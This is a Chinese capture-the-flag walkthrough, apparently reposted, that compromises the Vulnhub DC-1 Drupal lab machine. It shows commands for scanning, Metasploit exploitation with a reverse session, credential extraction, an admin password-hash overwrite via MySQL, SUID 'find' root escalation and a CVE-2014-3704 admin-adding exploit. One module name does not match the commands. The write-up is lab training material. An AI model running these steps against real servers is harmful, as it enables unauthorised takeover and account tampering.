當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

【Vulnhub靶机系列】DC1

發(fā)布時間：2024/1/23 编程问答 37 豆豆

生活随笔收集整理的這篇文章主要介紹了【Vulnhub靶机系列】DC1 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

基本信息

Kali： 192.168.56.116

DC1: 192.168.56.115

實驗過程

先在Kali中使用arp-scan進(jìn)行主機(jī)探活

sudo arp-scan --interface=eth1 192.168.56.0/24

逐個排查發(fā)現(xiàn)DC1的IP地址為192.168.56.115

然后使用nmap對主機(jī)進(jìn)行探測:

nmap -sC -sV -A -oA vulnhub/DC1/DC1 192.168.56.115

主機(jī)分別開了: 22,80,111端口

我們先從80端口入手

可以發(fā)現(xiàn)網(wǎng)站是Drupal cms管理系統(tǒng)

我們啟動msf，搜索下Drupal可用的EXP

msf > search Drupal

這里我們選用

exploit/unix/webapp/drupal_drupalgeddon2

因為他是最新的，而且品質(zhì)為excellent

msf6 > use exploit/unix/webapp/drupal_coder_execmsf6 exploit(unix/webapp/drupal_coder_exec) > show optionsmsf6 exploit(unix/webapp/drupal_coder_exec) > set RHOSTS 192.168.56.115msf6 exploit(unix/webapp/drupal_coder_exec) > set LHOST 192.168.56.116msf6 exploit(unix/webapp/drupal_coder_exec) > run

這樣我們就可以成功得到一個會話

我們用會話返回一個shell

發(fā)現(xiàn)flag1.txt

查看下flag1.txt內(nèi)容

給我們一個提示 Every good CMS needs a config file - and so do you.

百度drupal配置文件的位置

sites/default/files

里面可以看到數(shù)據(jù)庫的賬號密碼，同時我們還可以看到flag2的內(nèi)容說：爆破不是唯一獲得訪問權(quán)限方法

'database' => 'drupaldb','username' => 'dbuser','password' => 'R0ck3t',

那么我們用獲得數(shù)據(jù)庫的賬號密碼登錄下數(shù)據(jù)看看

這里需要注意的是，我們需要用python轉(zhuǎn)換成標(biāo)準(zhǔn)的shell，否則就會出現(xiàn)下面的場景，進(jìn)入mysql之后，shell就沒有反應(yīng):

我們輸入

python -c "import pty;pty.spawn('/bin/bash')"

mysql> show database; mysql> use drupaldb; mysql> show tables; mysql> select * from users; mysql> select name,pass from users;

這里的密碼是經(jīng)過drupal加密

在scripts的文件夾中有用來算密碼的腳本，但是因為靶機(jī)的環(huán)境原因會報錯。

網(wǎng)上找了下，直接用別人算好的hash進(jìn)行替換

明文：password密文：$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4

接下來我們把管理員的密碼重置下

mysql> update users set pass='$S$CDbdwZvjHQ09IVRs88G0fnaxPr50/kb81YI9.8M/D9okW7J/s5U4'where name='admin';

然后進(jìn)行登錄

然后發(fā)現(xiàn)flag3

從flag3的內(nèi)容可以看到，提示我們需要用find提權(quán)同時我們也可以在家目錄中找到flag4.

Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?

我們使用find找下具有root權(quán)限的suid。

# -perm? 按照文件權(quán)限來查找文件

# -u=w 基于用于可寫查找

# -type f 查找普通類型文件

find / -perm -u=s -type f 2>/dev/null

可以看到find是可以用來提權(quán)的

我們嘗試用find執(zhí)行命令

# 這里需要注意-name參數(shù)填寫的文件名，是需要系統(tǒng)真實存在的

www-data@DC-1:/home/flag4$ find / -name flag4 -exec "whoami" \;

那么我們接下來用find提權(quán)

www‐data@DC‐1:/home/flag4$ find / -name flag4 -exec "/bin/sh" \;

這樣我們就拿到最終的flag

額外內(nèi)容

使用CVE2014-3704添加管理賬號

在exploit-db中有可以直接利用的EXP，可以直接添加管理賬號地址：https://www.exploit-db.com/exploits/34992 我們在Kali上開啟HTTP服務(wù)，讓靶機(jī)從Kali上下載EXP

然后我們通過這個EXP創(chuàng)建管理賬號

www‐data@DC‐1:/var/www$ python 34992.py ‐t http://192.168.56.115/ ‐u dfz ‐p ms08067

然后就可以正常登錄

另一種查詢具有root權(quán)限命令的find語句

find / -user root -perm -4000 -print 2>/dev/null

創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎勵來咯，堅持創(chuàng)作打卡瓜分現(xiàn)金大獎

總結(jié)

以上是生活随笔為你收集整理的【Vulnhub靶机系列】DC1的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。

上一篇：干货|代码安全审计权威指南（附下载地址）
下一篇：【Vulnhub靶机系列】DC2